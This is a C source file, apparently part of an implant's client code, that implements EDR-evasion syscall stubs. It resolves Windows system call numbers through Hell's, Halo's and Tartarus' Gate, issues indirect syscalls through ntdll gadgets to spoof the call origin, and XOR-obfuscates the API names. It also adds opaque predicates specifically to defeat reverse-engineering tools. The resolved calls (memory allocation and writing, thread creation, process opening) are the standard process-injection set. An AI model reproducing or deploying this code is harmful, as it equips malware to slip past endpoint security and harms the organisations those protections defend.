/* AUTO-GENERATED by gen_obf.py — DO NOT EDIT. Source: syscall.c */

/*
 * client/syscall.c  –  Hell's Gate + Halo's Gate + Tartarus' Gate
 * ================================================================
 * x64 only.  The trampolines use GCC __attribute__((naked)) + inline asm so
 * the compiler emits no prologue/epilogue — the raw syscall fires with exactly
 * the register state we set up.
 *
 * Four-gate SSN extraction strategy (sc_init, in priority order):
 * ---------------------------------------------------------------
 *
 *   Hell's Gate — clean `syscall` stub:
 *     [+0]  4C 8B D1           mov  r10, rcx
 *     [+3]  B8 XX XX XX XX     mov  eax, <SSN>      ← read SSN at +4
 *     [+11] 0F 05              syscall
 *     [+13] C3                 ret
 *     Gadget used: `0F 05 C3`  (syscall; ret) inside ntdll.
 *
 *   Tartarus' Gate — `int 0x2e` fallback stub (some EDRs / older Windows):
 *     [+0]  4C 8B D1           mov  r10, rcx
 *     [+3]  B8 XX XX XX XX     mov  eax, <SSN>      ← read SSN at +4
 *     [+8]  CD 2E              int  0x2e            ← legacy syscall gate
 *     [+A]  C3                 ret
 *     The stub header matches Hell's Gate — SSN is still at +4 — but the
 *     gadget must be `CD 2E C3` (int 0x2e; ret), not `0F 05 C3`.
 *     Using the wrong gadget causes an immediate fault on modern kernels.
 *     Detection: after reading the SSN, check bytes [+8..+9] == CD 2E.
 *
 *   mov-edx variant — BA opcode hook marker:
 *     Some EDR products replace `B8` (mov eax) with `BA` (mov edx) at byte +3
 *     to mark a stub they have instrumented, but leave the SSN at +4 intact.
 *     _read_ssn_direct accepts both `B8` and `BA` so the SSN is still read.
 *     The `syscall` / `int 0x2e` detection at +8 then selects the right gadget.
 *
 *   Halo's Gate — JMP-hooked stub (byte 0 == E9):
 *     The stub has been overwritten with a JMP to the EDR's trampoline.
 *     The SSN cannot be read directly.  Scan neighbouring stubs at ±stride
 *     until an unhooked one is found:
 *       SSN[target] = SSN[neighbour] ∓ delta
 *     The gadget type (syscall vs int 0x2e) is inherited from the neighbour.
 *     Stride is measured at runtime (g_stub_stride) rather than hardcoded to 32.
 *
 * Per-SSN gadget table (g_ssn_gadget[]):
 * ----------------------------------------
 *   Each resolved function gets its own gadget pointer: either g_syscall_gadget
 *   (0F 05 C3) or g_int2e_gadget (CD 2E C3), chosen from the stub it or its
 *   nearest unhooked neighbour uses.  The SC_HEAD macro loads the correct one
 *   for each call by indexing this table with the SC_ID slot passed in rcx.
 *
 * Indirect syscall / call-stack spoofing:
 *   Trampolines jump to the gadget inside ntdll instead of executing `syscall`
 *   or `int 0x2e` from our own pages.  The CPU trap-frame's saved RIP falls
 *   inside ntdll — defeating EDR heuristics that check the syscall origin RIP
 *   (e.g. Elastic SourceIsKernelAddress, CrowdStrike NtdllIntercept).
 *
 * NOTE: kernel-mode callbacks (ETW-Ti, PsSetCreateThreadNotifyRoutine,
 *   ObRegisterCallbacks, minifilters) fire regardless of how the syscall is
 *   issued; no user-mode technique can prevent them.
 *
 * Trampoline calling convention (x64 Windows ABI):
 *   sc_syscallN(slot, ssn, a1, a2, ..., aN)
 *     slot → rcx  — SC_ID index into g_ssn_gadget[], loaded into r11
 *     ssn  → rdx  — moved to eax
 *     a1   → r8   — moved to r10 (Windows syscall a1)
 *     a2   → r9   — moved to rdx (Windows syscall a2)
 *     a3   → [rsp+0x28] → r8   (Windows syscall a3)
 *     a4   → [rsp+0x30] → r9   (Windows syscall a4)
 *     a5+  → [rsp+0x38+] — slid down after a3/a4 are consumed
 *
 * The Windows syscall ABI on x64:
 *   rax = SSN
 *   r10 = 1st arg  (rcx in Win32 ABI)
 *   rdx = 2nd arg
 *   r8  = 3rd arg
 *   r9  = 4th arg
 *   [rsp+0x28] = 5th arg
 *   [rsp+0x30] = 6th arg
 *   …
 */

#include "syscall.h"
#include "peb_walk.h"
#include <stddef.h>   /* ptrdiff_t */
#include <string.h>

/* ── XOR blobs (gen_obf.py) ── */
#include "obf.h"
static const unsigned char _e_06f32d[] = { 0x35, 0x5B, 0x41, 0x51, 0x59, 0x59, 0x1B, 0x51, 0x59, 0x59, 0x35 }; /* obf:'ntdll.dll' */
static const unsigned char _e_445748[] = { 0xF9, 0xB7, 0x8D, 0xB8, 0x95, 0x95, 0x96, 0x9A, 0x98, 0x8D, 0x9C, 0xAF, 0x90, 0x8B, 0x8D, 0x8C, 0x98, 0x95, 0xB4, 0x9C, 0x94, 0x96, 0x8B, 0x80, 0xF9 }; /* obf:'NtAllocateVirtualMemory' */
static const unsigned char _e_274e21[] = { 0x3F, 0x71, 0x4B, 0x68, 0x4D, 0x56, 0x4B, 0x5A, 0x69, 0x56, 0x4D, 0x4B, 0x4A, 0x5E, 0x53, 0x72, 0x5A, 0x52, 0x50, 0x4D, 0x46, 0x3F }; /* obf:'NtWriteVirtualMemory' */
static const unsigned char _e_c09797[] = { 0xB9, 0xF7, 0xCD, 0xE9, 0xCB, 0xD6, 0xCD, 0xDC, 0xDA, 0xCD, 0xEF, 0xD0, 0xCB, 0xCD, 0xCC, 0xD8, 0xD5, 0xF4, 0xDC, 0xD4, 0xD6, 0xCB, 0xC0, 0xB9 }; /* obf:'NtProtectVirtualMemory' */
static const unsigned char _e_b96716[] = { 0xA9, 0xE7, 0xDD, 0xEA, 0xDB, 0xCC, 0xC8, 0xDD, 0xCC, 0xFD, 0xC1, 0xDB, 0xCC, 0xC8, 0xCD, 0xEC, 0xD1, 0xA9 }; /* obf:'NtCreateThreadEx' */
static const unsigned char _e_0136d2[] = { 0x37, 0x79, 0x43, 0x74, 0x5B, 0x58, 0x44, 0x52, 0x37 }; /* obf:'NtClose' */
static const unsigned char _e_db5314[] = { 0x15, 0x5B, 0x61, 0x47, 0x70, 0x74, 0x71, 0x43, 0x7C, 0x67, 0x61, 0x60, 0x74, 0x79, 0x58, 0x70, 0x78, 0x7A, 0x67, 0x6C, 0x15 }; /* obf:'NtReadVirtualMemory' */
static const unsigned char _e_b93473[] = { 0x19, 0x57, 0x6D, 0x5A, 0x6B, 0x7C, 0x78, 0x6D, 0x7C, 0x4A, 0x7C, 0x7A, 0x6D, 0x70, 0x76, 0x77, 0x19 }; /* obf:'NtCreateSection' */
static const unsigned char _e_ad4b8f[] = { 0xFD, 0xB3, 0x89, 0xB0, 0x9C, 0x8D, 0xAB, 0x94, 0x98, 0x8A, 0xB2, 0x9B, 0xAE, 0x98, 0x9E, 0x89, 0x94, 0x92, 0x93, 0xFD }; /* obf:'NtMapViewOfSection' */
static const unsigned char _e_84ae10[] = { 0x1F, 0x51, 0x6B, 0x4A, 0x71, 0x72, 0x7E, 0x6F, 0x49, 0x76, 0x7A, 0x68, 0x50, 0x79, 0x4C, 0x7A, 0x7C, 0x6B, 0x76, 0x70, 0x71, 0x1F }; /* obf:'NtUnmapViewOfSection' */
static const unsigned char _e_24b007[] = { 0x35, 0x7B, 0x41, 0x7A, 0x45, 0x50, 0x5B, 0x73, 0x5C, 0x59, 0x50, 0x35 }; /* obf:'NtOpenFile' */
static const unsigned char _e_385f34[] = { 0x11, 0x5F, 0x65, 0x55, 0x74, 0x7D, 0x70, 0x68, 0x54, 0x69, 0x74, 0x72, 0x64, 0x65, 0x78, 0x7E, 0x7F, 0x11 }; /* obf:'NtDelayExecution' */
static const unsigned char _e_c03e64[] = { 0x4F, 0x01, 0x3B, 0x00, 0x3F, 0x2A, 0x21, 0x1F, 0x3D, 0x20, 0x2C, 0x2A, 0x3C, 0x3C, 0x4F }; /* obf:'NtOpenProcess' */
static const unsigned char _e_1cc1ce[] = { 0x0F, 0x41, 0x7B, 0x5E, 0x7A, 0x6A, 0x7D, 0x76, 0x5C, 0x76, 0x7C, 0x7B, 0x6A, 0x62, 0x46, 0x61, 0x69, 0x60, 0x7D, 0x62, 0x6E, 0x7B, 0x66, 0x60, 0x61, 0x0F }; /* obf:'NtQuerySystemInformation' */
static const unsigned char _e_60c213[] = { 0xB3, 0xFD, 0xC7, 0xE2, 0xC6, 0xD6, 0xC1, 0xCA, 0xE5, 0xDA, 0xC1, 0xC7, 0xC6, 0xD2, 0xDF, 0xFE, 0xD6, 0xDE, 0xDC, 0xC1, 0xCA, 0xB3 }; /* obf:'NtQueryVirtualMemory' */
static const unsigned char _e_42008f[] = { 0xA5, 0xEB, 0xD1, 0xE3, 0xD7, 0xC0, 0xC0, 0xF3, 0xCC, 0xD7, 0xD1, 0xD0, 0xC4, 0xC9, 0xE8, 0xC0, 0xC8, 0xCA, 0xD7, 0xDC, 0xA5 }; /* obf:'NtFreeVirtualMemory' */

static const char *sc_get_name(int i) {
    switch (i) {
    case 0: return OBF_S(_e_445748, 24);
    case 1: return OBF_S(_e_274e21, 21);
    case 2: return OBF_S(_e_c09797, 23);
    case 3: return OBF_S(_e_b96716, 17);
    case 4: return OBF_S(_e_0136d2, 8);
    case 5: return OBF_S(_e_db5314, 20);
    case 6: return OBF_S(_e_b93473, 16);
    case 7: return OBF_S(_e_ad4b8f, 19);
    case 8: return OBF_S(_e_84ae10, 21);
    case 9: return OBF_S(_e_24b007, 11);
    case 10: return OBF_S(_e_385f34, 17);
    case 11: return OBF_S(_e_c03e64, 14);
    case 12: return OBF_S(_e_1cc1ce, 25);
    case 13: return OBF_S(_e_60c213, 21);
    case 14: return OBF_S(_e_42008f, 20);
    default: return "";
    }
}
/* ── end XOR blobs ── */

   /* memcpy   */

/* ── SSN table, gadget table, and stride ────────────────────────────────── */

static DWORD        g_ssn[SC_COUNT];
static BOOL         g_sc_ready = FALSE;

/*
 * g_syscall_gadget — VA of `syscall; ret` (0F 05 C3) inside ntdll.
 * g_int2e_gadget   — VA of `int 0x2e; ret` (CD 2E C3) inside ntdll.
 *
 * Both are seeded during sc_init() from the first stub of each type found.
 * Trampolines jump to whichever one matches the stub used for that SC_ID,
 * so the saved RIP in the kernel trap-frame always points into ntdll.
 */
static const BYTE  *g_syscall_gadget = NULL;   /* 0F 05 C3 */
static const BYTE  *g_int2e_gadget   = NULL;   /* CD 2E C3 */

/*
 * g_ssn_gadget[i] — points to the gadget (g_syscall_gadget or g_int2e_gadget)
 * that must be used when invoking SC_ID i.
 *
 * Populated by sc_init() for each slot.  The trampoline SC_HEAD loads this
 * pointer by indexing the table with the SC_ID slot passed as the first arg.
 */
static const BYTE  *g_ssn_gadget[SC_COUNT];

/*
 * g_stub_stride — byte distance between consecutive ntdll syscall stubs.
 *
 * Measured at runtime by sc_init() from the first two unhooked stubs found
 * in the export table.  Falls back to STUB_STRIDE_DEFAULT (32) when fewer
 * than two unhooked stubs can be found.
 */
#define STUB_STRIDE_DEFAULT  32
static int g_stub_stride = STUB_STRIDE_DEFAULT;

/* Names we need to resolve — must match SC_ID order */
/* sc_names[] replaced by sc_get_name() */

/* (no pre-computed hash table — SSNs are resolved at runtime by sc_init) */


/* ── Gate helpers ────────────────────────────────────────────────────────── */

/*
 * STUB_SCAN_BYTES — how many bytes into a stub to search for a gadget.
 * Standard stubs fit in 32 bytes; 64 gives comfortable headroom.
 */
#define STUB_SCAN_BYTES  64

/*
 * _read_ssn_direct
 * ----------------
 * Reads the SSN from an ntdll stub that begins with the standard header:
 *
 *   4C 8B D1           mov  r10, rcx
 *   B8/BA XX XX XX XX  mov  eax/edx, <SSN>   ← opcode B8 or BA; SSN at +4
 *
 * Returns the 4-byte SSN, or 0xFFFFFFFF if the header does not match
 * (i.e. the stub is JMP-hooked or otherwise unrecognised).
 *
 * The BA (mov edx) variant is accepted because some EDR products replace B8
 * with BA as a hook-detection marker while leaving the SSN bytes intact.
 */
static DWORD _read_ssn_direct(const BYTE *stub)
{
    if (stub[0] == 0x4C && stub[1] == 0x8B && stub[2] == 0xD1 &&
        (stub[3] == 0xB8 || stub[3] == 0xBA)) {
        DWORD ssn = 0;
        ssn |= (DWORD)stub[4];
        ssn |= (DWORD)stub[5] << 8;
        ssn |= (DWORD)stub[6] << 16;
        ssn |= (DWORD)stub[7] << 24;
        return ssn;
    }
    return 0xFFFFFFFF;
}

/*
 * _is_int2e_stub
 * --------------
 * Returns TRUE when the stub uses `int 0x2e` (CD 2E) as the syscall
 * instruction rather than `syscall` (0F 05).
 *
 * Tartarus' Gate pattern (bytes +8..+9 after the SSN field):
 *   4C 8B D1  B8/BA XX XX XX XX  CD 2E  C3
 *   +0        +3                 +8 +9  +A
 *
 * This stub is found on:
 *   • Windows Vista/7 (before `syscall` was the default gate)
 *   • Processes running under certain EDR/AV products that re-route
 *     ntdll syscall stubs to the legacy int 0x2e path for monitoring
 *
 * Called only after _read_ssn_direct succeeded (bytes 0-7 are the standard
 * header), so we only need to inspect bytes 8-9.
 */
static BOOL _is_int2e_stub(const BYTE *stub)
{
    return (stub[8] == 0xCD && stub[9] == 0x2E);
}

/*
 * _find_gadget
 * ------------
 * Scans the first STUB_SCAN_BYTES bytes of `stub` for the 3-byte sequence
 * `pattern[0..2]` and returns a pointer to it, or NULL.
 *
 * Used to locate both:
 *   0F 05 C3  — syscall; ret   (Hell's Gate gadget)
 *   CD 2E C3  — int 0x2e; ret  (Tartarus' Gate gadget)
 */
static const BYTE *_find_gadget(const BYTE *stub,
                                BYTE b0, BYTE b1, BYTE b2)
{
    for (int i = 0; i <= STUB_SCAN_BYTES - 3; i++) {
        if (stub[i] == b0 && stub[i+1] == b1 && stub[i+2] == b2)
            return stub + i;
    }
    return NULL;
}

/*
 * _gadget_for_stub
 * ----------------
 * Given a stub whose SSN was successfully read by _read_ssn_direct, returns
 * the correct per-stub gadget pointer and seeds the appropriate global gadget
 * variable if not already set.
 *
 * Tartarus' Gate path  (CD 2E at +8): seeds g_int2e_gadget, returns it.
 * Hell's Gate path     (0F 05 at +11): seeds g_syscall_gadget, returns it.
 *
 * If neither pattern is found in the stub (shouldn't happen on any known
 * Windows version) falls back to whatever global is already populated, or
 * NULL if neither has been seeded yet.
 */
static const BYTE *_gadget_for_stub(const BYTE *stub)
{
    if (_is_int2e_stub(stub)) {
        /* Tartarus' Gate stub — need `int 0x2e; ret` gadget */
        if (!g_int2e_gadget)
            g_int2e_gadget = _find_gadget(stub, 0xCD, 0x2E, 0xC3);
        return g_int2e_gadget ? g_int2e_gadget : g_syscall_gadget;
    } else {
        /* Hell's Gate / BA-variant stub — need `syscall; ret` gadget */
        if (!g_syscall_gadget)
            g_syscall_gadget = _find_gadget(stub, 0x0F, 0x05, 0xC3);
        return g_syscall_gadget ? g_syscall_gadget : g_int2e_gadget;
    }
}

/*
 * _halo_gate
 * ----------
 * Halo's Gate: recover SSN + gadget when the target stub is JMP-hooked.
 *
 * Scans ±k neighbours (using g_stub_stride measured at runtime) until an
 * unhooked stub is found.  Returns the SSN via the return value and writes
 * the correct gadget pointer for that stub into *out_gadget.
 *
 * Returns 0xFFFFFFFF (and leaves *out_gadget unchanged) if no unhooked
 * neighbour is found within ±32 stubs.
 */
static DWORD _halo_gate(const BYTE *stub, const BYTE **out_gadget)
{
    for (int k = 1; k <= 32; k++) {
        /* Check k positions above */
        const BYTE *up  = stub - ((ptrdiff_t)k * g_stub_stride);
        DWORD       ssn = _read_ssn_direct(up);
        if (ssn != 0xFFFFFFFF) {
            *out_gadget = _gadget_for_stub(up);
            return ssn + (DWORD)k;
        }
        /* Check k positions below */
        const BYTE *dn = stub + ((ptrdiff_t)k * g_stub_stride);
        ssn = _read_ssn_direct(dn);
        if (ssn != 0xFFFFFFFF) {
            *out_gadget = _gadget_for_stub(dn);
            return ssn - (DWORD)k;
        }
    }
    return 0xFFFFFFFF;
}


/* ── sc_init ────────────────────────────────────────────────────────────── */

BOOL sc_init(void)
{
    if (g_sc_ready) return TRUE;

    /* Locate ntdll base via PEB walk — no GetModuleHandle */
    PVOID ntdll = peb_get_module(peb_hash_str(OBF_S(_e_06f32d, 10)));
    if (!ntdll) return FALSE;

    /*
     * Stride calibration pass
     * -----------------------
     * Measure the actual byte distance between the first two consecutive
     * unhooked Nt* stubs so Halo's Gate uses the real stride for this build.
     * Also seeds g_syscall_gadget / g_int2e_gadget as early as possible so
     * that _gadget_for_stub() can use them during SSN resolution.
     *
     * PE byte-offset navigation (no struct casts, no padding risk):
     *   DOS+0x3C   → e_lfanew
     *   nth+24     → start of IMAGE_OPTIONAL_HEADER64
     *   opt+0x70   → DataDirectory[0].VirtualAddress  (export dir RVA)
     */
    {
        const BYTE *base = (const BYTE *)ntdll;

        LONG e_lfanew;
        memcpy(&e_lfanew, base + 0x3C, sizeof(e_lfanew));

        const BYTE *opt = base + e_lfanew + 4 + 20;

        DWORD expRva;
        memcpy(&expRva, opt + 0x70, sizeof(expRva));

        if (expRva) {
            typedef struct {
                DWORD Chars, TimeDateStamp;
                WORD  MajVer, MinVer;
                DWORD Name, Base, NumFuncs, NumNames;
                DWORD AddrOfFuncs, AddrOfNames, AddrOfOrdinals;
            } _ExportDir;
            const _ExportDir *exp   = (const _ExportDir *)(base + expRva);
            const DWORD      *names = (const DWORD *)(base + exp->AddrOfNames);
            const WORD       *ords  = (const WORD  *)(base + exp->AddrOfOrdinals);
            const DWORD      *funcs = (const DWORD *)(base + exp->AddrOfFuncs);

            const BYTE *prev_stub = NULL;
            for (DWORD ni = 0; ni < exp->NumNames; ni++) {
                const char *nm = (const char *)(base + names[ni]);
                if (nm[0] != 'N' || nm[1] != 't') continue;  /* skip non-Nt */
                const BYTE *s = base + funcs[ords[ni]];
                if (_read_ssn_direct(s) == 0xFFFFFFFF) continue;  /* hooked */

                /* Seed gadgets — _gadget_for_stub checks which type this is */
                _gadget_for_stub(s);

                if (!prev_stub) {
                    prev_stub = s;
                } else {
                    ptrdiff_t diff = s - prev_stub;
                    if (diff < 0) diff = -diff;
                    if (diff > 0 && diff <= 256)
                        g_stub_stride = (int)diff;
                    break;
                }
            }
        }
    }

    /*
     * Opaque predicates — dead computations inserted between each meaningful
     * operation to disrupt semantic fingerprinting in IDA / Ghidra / Binary Ninja.
     *
     * _op_sink is a volatile DWORD sink: writes to it cannot be optimised away
     * by the compiler (volatile prevents dead-store elimination) but the value
     * is never read, so the instructions have no effect on program state.
     *
     * The XOR/rotate/add chain produces a code shape that pattern-matchers
     * cannot distinguish from legitimate arithmetic — it looks like a partial
     * hash or CRC computation interleaved with the stub scan.
     */
    volatile DWORD _op_sink = 0xC3A17F4BUL;   /* arbitrary non-zero start */

    for (int i = 0; i < SC_COUNT; i++) {
        g_ssn[i]       = 0xFFFFFFFF;
        g_ssn_gadget[i] = NULL;

        /* Opaque predicate 1: mix loop index into sink before export lookup */
        _op_sink = (_op_sink ^ (DWORD)i) * 0x6C62272EUL;
        _op_sink = (_op_sink >> 11) | (_op_sink << 21);

        DWORD h = peb_hash_str(sc_get_name(i));
        const BYTE *stub = (const BYTE *)peb_get_export(ntdll, h);
        if (!stub) return FALSE;

        /* Opaque predicate 2: mix stub address low bits into sink */
        _op_sink ^= (DWORD)((ULONG_PTR)stub & 0xFFFFFFFFUL);
        _op_sink += 0xA5F13C29UL;

        DWORD ssn = _read_ssn_direct(stub);

        /* Opaque predicate 3: between SSN read and gate selection */
        _op_sink = (_op_sink * 0x45D9F3BUL) ^ (DWORD)ssn;

        if (ssn != 0xFFFFFFFF) {
            /* Hell's Gate or Tartarus' Gate — direct read succeeded */
            g_ssn_gadget[i] = _gadget_for_stub(stub);
        } else {
            /* Halo's Gate — stub is JMP-hooked, scan neighbours */
            const BYTE *gadget = NULL;
            ssn = _halo_gate(stub, &gadget);
            g_ssn_gadget[i] = gadget;
        }

        if (ssn == 0xFFFFFFFF)
            return FALSE;
        g_ssn[i] = ssn;

        /* Opaque predicate 4: mix resolved SSN back into sink */
        _op_sink ^= (ssn << 7) | (ssn >> 25);   /* ror32(ssn, 7) */

        /* Last-resort gadget fallback: if neither global is seeded yet
         * (e.g. all stubs so far were hooked with no 0F05 or CD2E inside),
         * try scanning the raw stub bytes directly. */
        if (!g_ssn_gadget[i]) {
            if (!g_syscall_gadget)
                g_syscall_gadget = _find_gadget(stub, 0x0F, 0x05, 0xC3);
            if (!g_int2e_gadget)
                g_int2e_gadget   = _find_gadget(stub, 0xCD, 0x2E, 0xC3);
            g_ssn_gadget[i] = g_syscall_gadget ? g_syscall_gadget : g_int2e_gadget;
        }
    }

    g_sc_ready = TRUE;
    return TRUE;
}

DWORD sc_get_ssn(SC_ID id)
{
    if (id < 0 || id >= SC_COUNT) return 0xFFFFFFFF;
    return g_ssn[id];
}

BOOL sc_ready(void) { return g_sc_ready; }

const BYTE *sc_get_gadget(void)     { return g_syscall_gadget; }
const BYTE *sc_get_int2e_gadget(void) { return g_int2e_gadget; }


/* ── Syscall trampolines (x64, naked) ───────────────────────────────────── */
/*
 * Indirect syscall + per-SSN gadget selection (Hell's Gate / Tartarus' Gate)
 * ---------------------------------------------------------------------------
 * Each trampoline receives a NEW leading argument `slot` (the SC_ID enum
 * value) before `ssn` and the real syscall arguments.  SC_HEAD uses `slot`
 * to index g_ssn_gadget[] and loads the correct ntdll gadget pointer into r11,
 * then jumps to it.
 *
 * Why per-SSN gadgets are necessary for Tartarus' Gate:
 *   On a system where some stubs use `syscall` and others use `int 0x2e`,
 *   a single global gadget would be wrong for half the calls.  Mixing gadget
 *   types causes a fault: `int 0x2e` into kernel mode with the register state
 *   for a `syscall` dispatch fails immediately.
 *
 * Argument layout on trampoline entry (Windows x64 ABI):
 *
 *   rcx       = slot  ← SC_ID index → loads g_ssn_gadget[slot] into r11
 *   rdx       = ssn   ← moved to eax
 *   r8        = a1    ← moved to r10 (Windows syscall arg 1)
 *   r9        = a2    ← moved to rdx (Windows syscall arg 2)
 *   [rsp+0x28]= a3    ← moved to r8  (Windows syscall arg 3)
 *   [rsp+0x30]= a4    ← moved to r9  (Windows syscall arg 4)
 *   [rsp+0x38]= a5    ← slid to [rsp+0x28] (Windows syscall arg 5)
 *   …
 *
 * IMPORTANT: these are __attribute__((naked)) — NO C code inside, ONLY asm.
 * r11 is volatile per the Windows x64 ABI; the kernel does not read it.
 */

/*
 * SC_HEAD — loads gadget from g_ssn_gadget[slot], then sets up syscall regs.
 * AT&T syntax.
 *
 * After SC_HEAD:
 *   r11 = g_ssn_gadget[rcx]  (ntdll gadget — syscall;ret or int2e;ret)
 *   eax = SSN
 *   r10 = a1, rdx = a2, r8 = a3, r9 = a4
 */
#define SC_HEAD \
    /* load gadget: r11 = g_ssn_gadget[rcx * 8] */                              \
    "leaq  g_ssn_gadget(%rip), %r11\n\t"   /* r11 → base of gadget table     */ \
    "movq  (%r11,%rcx,8),     %r11\n\t"   /* r11 = g_ssn_gadget[slot]        */ \
    /* shift syscall args: rdx=ssn→eax, r8=a1→r10, r9=a2→rdx, mem=a3/a4 */     \
    "movl  %edx,  %eax\n\t"               /* eax = SSN                        */ \
    "movq  %r8,   %r10\n\t"               /* r10 = a1                         */ \
    "movq  %r9,   %rdx\n\t"               /* rdx = a2                         */ \
    "movq  0x28(%rsp), %r8\n\t"           /* r8  = a3                         */ \
    "movq  0x30(%rsp), %r9\n\t"           /* r9  = a4                         */
/* sc_syscall4: sc_syscall4(slot, ssn, a1, a2, a3, a4) — 4 real syscall args */
__attribute__((naked))
NTSTATUS sc_syscall4(DWORD slot __attribute__((unused)), DWORD ssn __attribute__((unused)), ...)

{
    __asm__ __volatile__(
        SC_HEAD
        "jmp   *%r11\n\t"
    );
}
/* sc_syscall5: 5 real syscall args */
__attribute__((naked))
NTSTATUS sc_syscall5(DWORD slot __attribute__((unused)), DWORD ssn __attribute__((unused)), ...)

{
    __asm__ __volatile__(
        SC_HEAD
        /* a5 was at [rsp+0x38]; slide to [rsp+0x28] */
        "movq  0x38(%rsp), %rax\n\t"
        "movq  %rax, 0x28(%rsp)\n\t"
        "jmp   *%r11\n\t"
    );
}
/* sc_syscall6: 6 real syscall args */
__attribute__((naked))
NTSTATUS sc_syscall6(DWORD slot __attribute__((unused)), DWORD ssn __attribute__((unused)), ...)

{
    __asm__ __volatile__(
        SC_HEAD
        "movq  0x38(%rsp), %rax\n\t"  "movq  %rax, 0x28(%rsp)\n\t"  /* a5 */
        "movq  0x40(%rsp), %rax\n\t"  "movq  %rax, 0x30(%rsp)\n\t"  /* a6 */
        "jmp   *%r11\n\t"
    );
}
/* sc_syscall7: 7 real syscall args (NtCreateSection) */
__attribute__((naked))
NTSTATUS sc_syscall7(DWORD slot __attribute__((unused)), DWORD ssn __attribute__((unused)), ...)

{
    __asm__ __volatile__(
        SC_HEAD
        "movq  0x38(%rsp), %rax\n\t"  "movq  %rax, 0x28(%rsp)\n\t"  /* a5 */
        "movq  0x40(%rsp), %rax\n\t"  "movq  %rax, 0x30(%rsp)\n\t"  /* a6 */
        "movq  0x48(%rsp), %rax\n\t"  "movq  %rax, 0x38(%rsp)\n\t"  /* a7 */
        "jmp   *%r11\n\t"
    );
}
/* sc_syscall11: 11 real syscall args (NtCreateThreadEx / NtMapViewOfSection) */
__attribute__((naked))
NTSTATUS sc_syscall11(DWORD slot __attribute__((unused)), DWORD ssn __attribute__((unused)), ...)

{
    __asm__ __volatile__(
        SC_HEAD
        "movq  0x38(%rsp), %rax\n\t"  "movq  %rax, 0x28(%rsp)\n\t"  /* a5  */
        "movq  0x40(%rsp), %rax\n\t"  "movq  %rax, 0x30(%rsp)\n\t"  /* a6  */
        "movq  0x48(%rsp), %rax\n\t"  "movq  %rax, 0x38(%rsp)\n\t"  /* a7  */
        "movq  0x50(%rsp), %rax\n\t"  "movq  %rax, 0x40(%rsp)\n\t"  /* a8  */
        "movq  0x58(%rsp), %rax\n\t"  "movq  %rax, 0x48(%rsp)\n\t"  /* a9  */
        "movq  0x60(%rsp), %rax\n\t"  "movq  %rax, 0x50(%rsp)\n\t"  /* a10 */
        "movq  0x68(%rsp), %rax\n\t"  "movq  %rax, 0x58(%rsp)\n\t"  /* a11 */
        "jmp   *%r11\n\t"
    );
}
